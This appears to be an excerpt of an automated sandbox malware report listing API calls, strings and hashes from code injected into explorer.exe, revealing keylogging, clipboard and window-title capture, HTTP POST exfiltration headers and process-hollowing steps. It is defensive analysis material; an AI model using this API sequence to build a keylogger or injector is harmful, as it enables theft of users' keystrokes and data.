                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                        • String ID: %02X
                                                                                                        • API String ID: 3341110664-436463671
                                                                                                        • Opcode ID: add4b2080a038ef41e57dd6879f124ebc04e39f0b50e75b02ddb82f41d9f0b50
                                                                                                        • Instruction ID: e0f5582ec7b993d794935547184a4f619a4d6610014c2b9ea852b0b5868d4d03
                                                                                                        • Opcode Fuzzy Hash: add4b2080a038ef41e57dd6879f124ebc04e39f0b50e75b02ddb82f41d9f0b50
                                                                                                        • Instruction Fuzzy Hash: B3117CB1D4010CBFEB20DB94DC88EEEBBBCEB49788F1104A1FA04E2100D6384E189B30
                                                                                                        APIs
                                                                                                        • GetKeyboardState.USER32(?), ref: 02F21652
                                                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02F2167A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: KeyboardStateUnicode
                                                                                                        • String ID:
                                                                                                        • API String ID: 3453085656-3916222277
                                                                                                        • Opcode ID: cbb5c6cf815d7672ea8a1b5e00c956f5fb0a9398e32de499a9e46f6f09b33008
                                                                                                        • Instruction ID: 2e1311e14f276314dc67aafd85da29f7836d9c79f37f88de3ef4ff3953a316ae
                                                                                                        • Opcode Fuzzy Hash: cbb5c6cf815d7672ea8a1b5e00c956f5fb0a9398e32de499a9e46f6f09b33008
                                                                                                        • Instruction Fuzzy Hash: 9D01DB31D0022A5BDB34CA10D944BFFBB7CAF07784F094519DA09E6042D734D54D8FA9

                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(02F25013,0000001C), ref: 02F213C8
                                                                                                        • VirtualQuery.KERNEL32(02F213AE,?,0000001C), ref: 02F213DA
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02F2140B
                                                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 02F2141C
                                                                                                        • wsprintfA.USER32 ref: 02F21433
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02F21448
                                                                                                        • GetLastError.KERNEL32 ref: 02F2144E
                                                                                                        • RtlInitializeCriticalSection.NTDLL(02F2582C), ref: 02F21465
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 02F21489
                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02F214A6
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F214AF
                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02F214D0
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 02F214D3
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02F214F1
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02F2150D
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F21514
                                                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 02F2152A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                        • API String ID: 3628807430-1779906909

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(02F2582C), ref: 02F216C4
                                                                                                        • lstrlenW.KERNEL32 ref: 02F216DB
                                                                                                        • lstrlenW.KERNEL32 ref: 02F216F3
                                                                                                        • wsprintfW.USER32 ref: 02F21743
                                                                                                        • GetForegroundWindow.USER32 ref: 02F2174E
                                                                                                        • GetWindowTextW.USER32(00000000,02F25850,00000800), ref: 02F21767
                                                                                                        • GetClassNameW.USER32(00000000,02F25850,00000800), ref: 02F21774
                                                                                                        • lstrcmpW.KERNEL32(02F25020,02F25850), ref: 02F21781
                                                                                                        • lstrcpyW.KERNEL32(02F25020,02F25850), ref: 02F2178D
                                                                                                        • wsprintfW.USER32 ref: 02F217AD
                                                                                                        • lstrcatW.KERNEL32 ref: 02F217C6
                                                                                                        • RtlLeaveCriticalSection.NTDLL(02F2582C), ref: 02F217D3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                        • API String ID: 2651329914-3371406555

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 02F22603
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 02F2260B
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02F2261B
                                                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 02F22629
                                                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02F22648
                                                                                                        • SuspendThread.KERNEL32(00000000), ref: 02F22658
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22667
                                                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 02F22677
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22682
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 1467098526-0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                          • Part of subcall function 02F2298A: lstrlen.KERNEL32(02F24FE2,?,00000000,00000000,02F220DD,74DE8A60,02F24FE2,00000000), ref: 02F22992
                                                                                                          • Part of subcall function 02F2298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02F24FE2,00000001,00000000,00000000), ref: 02F229A4
                                                                                                          • Part of subcall function 02F224CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02F224DE
                                                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 02F22139
                                                                                                        • wsprintfW.USER32 ref: 02F22272
                                                                                                        • wsprintfW.USER32 ref: 02F222DD
                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F223A7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                        • API String ID: 4204651544-1701262698

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 02F229BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,02F212D9,00000000,00000000,?,00000001), ref: 02F229C7
                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02F212DC
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 02F2138A
                                                                                                          • Part of subcall function 02F22841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02F21119,00000001), ref: 02F22850
                                                                                                          • Part of subcall function 02F22841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02F21119,00000001), ref: 02F22855
                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 02F21316
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F21332
                                                                                                          • Part of subcall function 02F22569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02F2136E), ref: 02F22591
                                                                                                          • Part of subcall function 02F22569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02F2259A
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 02F2135F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 2993730741-0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 02F215A9
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02F215C6
                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 02F215DC
                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 02F21600
                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 02F2161C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 1114890469-0

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 02F21BF4
                                                                                                        • LoadLibraryA.KERNEL32(?,02F25848,00000000,00000000,74DF2EE0,00000000,02F219B6,?,?,?,00000001,?,00000000), ref: 02F21C1C
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02F21C49
                                                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02F21C9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                        • String ID:
                                                                                                        • API String ID: 3827878703-0
                                                                                                        APIs
                                                                                                        • RtlEnterCriticalSection.NTDLL(02F2582C), ref: 02F21839
                                                                                                        • lstrlenW.KERNEL32 ref: 02F21845
                                                                                                        • RtlLeaveCriticalSection.NTDLL(02F2582C), ref: 02F218A9
                                                                                                        • Sleep.KERNEL32(00007530), ref: 02F218B4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2134730579-0
                                                                                                        APIs
                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02F211DD), ref: 02F226DB
                                                                                                        • IsWow64Process.KERNEL32(000000FF,?), ref: 02F226ED
                                                                                                        • IsWow64Process.KERNEL32(00000000,?), ref: 02F22700
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 02F22716
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Process$Wow64$CloseHandleOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 331459951-0
                                                                                                        • Opcode ID: 2e097a6debc1f9691cf1c76b40d5a727e1eb7f27e1446c0dcfd7690f16301df5
                                                                                                        • Instruction ID: cfa37eee8eee9bab1d4a031ed28e8acdbed97ca75a1180efcc5e112c0be3b063
                                                                                                        • Opcode Fuzzy Hash: 2e097a6debc1f9691cf1c76b40d5a727e1eb7f27e1446c0dcfd7690f16301df5
                                                                                                        • Instruction Fuzzy Hash: 49F036B5D4612DFF9B20CF909D448AEF77CDF06699B14029AEA1493140D7355E0897B1
                                                                                                        APIs
                                                                                                          • Part of subcall function 02F22A09: GetProcessHeap.KERNEL32(00000008,0000A000,02F210BF), ref: 02F22A0C
                                                                                                          • Part of subcall function 02F22A09: RtlAllocateHeap.NTDLL(00000000), ref: 02F22A13
                                                                                                        • GetLocalTime.KERNEL32(?,00000000), ref: 02F217F3
                                                                                                        • wsprintfW.USER32 ref: 02F2181D
                                                                                                        Strings
                                                                                                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 02F21817
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000013.00000002.4174455214.0000000002F21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F21000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_19_2_2f21000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                        • API String ID: 377395780-613334611
                                                                                                        • Opcode ID: 0eeb21b26a5dc019f9f4b6452c4353713e0eaf95362905d62c2246f39d5d4c70
                                                                                                        • Instruction ID: a28218a7ca8b6bfcf1937e17f1c318317e9586f436526088e83805af581f9c28
                                                                                                        • Opcode Fuzzy Hash: 0eeb21b26a5dc019f9f4b6452c4353713e0eaf95362905d62c2246f39d5d4c70
                                                                                                        • Instruction Fuzzy Hash: EEF030A2D00138BA9724ABD99D059FFB3FCEB0DB42B00058AFA41E1180E67C5A64D7B5

Callgraph

(Interactive callgraph rendering not reproduced: it listed the Function_00EE... nodes of this memory dump and their call edges, shaded by executed/not-executed state and relevance.)

Control-flow Graph

(Control-flow graph rendering for function ee370c not reproduced: its basic blocks call ee1c6c, ee1838, NtUnmapViewOfSection, ee34c4, ee31ac and ee370c itself.)
                                                                                                        APIs
                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 00EE378C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SectionUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 498011366-0
                                                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                        • Instruction ID: e452f951a80f6bffc5b01649d55be9c63636b680c455bfb6591a7b95bb7f89a1
                                                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                        • Instruction Fuzzy Hash: F211C87461194D4FFB5CFB79989D37633E2F714312F54506EE815C76A2EE398A818700

Control-flow Graph

(Control-flow graph rendering for function eeb4a8 not reproduced: its basic blocks call eeb46a, LoadLibraryA and VirtualProtect twice.)
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00EEB5A7
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00EEB651
                                                                                                        • VirtualProtect.KERNELBASE ref: 00EEB66F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EEA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EEA000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_eea000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                        • Instruction ID: 86c99aab491f440027c59fe3d355ae4e9293ade6ddbad9fc060975c4e1cc7dc6
                                                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                        • Instruction Fuzzy Hash: 0551BE31754D9E4BCB24AB7EACC43F6B3D2F755329B18163AC49AD3285E758C84A8381

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00EE1BF8: OpenFileMappingA.KERNEL32 ref: 00EE1C0F
                                                                                                          • Part of subcall function 00EE1BF8: MapViewOfFile.KERNELBASE ref: 00EE1C2E
                                                                                                        • SysFreeMap.PGOCR ref: 00EE36F7
                                                                                                        • SleepEx.KERNELBASE ref: 00EE3701
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 4205437007-0
                                                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                        • Instruction ID: a02cdc3d938bcd78c0fb42f8d3a3bd2191709098181c5fdba47b2e109c6c0c8a
                                                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                        • Instruction Fuzzy Hash: 0551E830208A4C8FDB19FF3AD85DAAA73E2EB94304F44565DE45BD32A1DF38DA458781

Control-flow Graph

(Control-flow graph rendering for function ee1bf8 not reproduced: its basic blocks call OpenFileMappingA and MapViewOfFile.)
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$MappingOpenView
                                                                                                        • String ID:
                                                                                                        • API String ID: 3439327939-0
                                                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                        • Instruction ID: 4a826d61f1edf7c39cf938ad3364991c881e2c36379243ae24a5e22095ffd73e
                                                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                        • Instruction Fuzzy Hash: 97F08234314F4D4FAB48EF7C9C9C135B7E0EBA8202700857A984AC6164EF34C8808701